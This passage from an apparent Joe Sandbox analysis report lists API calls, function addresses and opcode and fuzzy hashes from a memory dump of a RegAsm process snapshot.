                                                                                                                            • Opcode Fuzzy Hash: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                                                                                            • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 004100FB
                                                                                                                            • memset.MSVCRT ref: 00410112
                                                                                                                              • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                              • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                            • _snwprintf.MSVCRT ref: 00410141
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                            • String ID: </%s>
                                                                                                                            • API String ID: 3400436232-259020660
                                                                                                                            • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                            • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                            • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                            • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                              • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                            • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                            • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                            • String ID: MS Sans Serif
                                                                                                                            • API String ID: 210187428-168460110
                                                                                                                            • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                            • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                            • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                            • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 00412057
                                                                                                                              • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                            • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                            • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                            • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3550944819-0
                                                                                                                            • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                            • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                            • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                            • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                            APIs
                                                                                                                            • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                            • free.MSVCRT ref: 0040B201
                                                                                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                            • free.MSVCRT ref: 0040B224
                                                                                                                            • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free$memcpy$mallocwcslen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 726966127-0
                                                                                                                            • Opcode ID: 6ce6fee0dcc9b9c9ebe83d30a233e08065b6d511c8ed6dc8d89b241ff4cd5fb7
                                                                                                                            • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                            • Opcode Fuzzy Hash: 6ce6fee0dcc9b9c9ebe83d30a233e08065b6d511c8ed6dc8d89b241ff4cd5fb7
                                                                                                                            • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                            APIs
                                                                                                                            • strlen.MSVCRT ref: 0040B0D8
                                                                                                                            • free.MSVCRT ref: 0040B0FB
                                                                                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                            • free.MSVCRT ref: 0040B12C
                                                                                                                            • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free$memcpy$mallocstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3669619086-0
                                                                                                                            • Opcode ID: 1032aca3c4d565b21c9c93c1da03fa01242ca6c05261a3900927d5bb2d17b358
                                                                                                                            • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                            • Opcode Fuzzy Hash: 1032aca3c4d565b21c9c93c1da03fa01242ca6c05261a3900927d5bb2d17b358
                                                                                                                            • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ??2@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1033339047-0
                                                                                                                            • Opcode ID: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                                                                                                                            • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                            • Opcode Fuzzy Hash: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                                                                                                                            • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49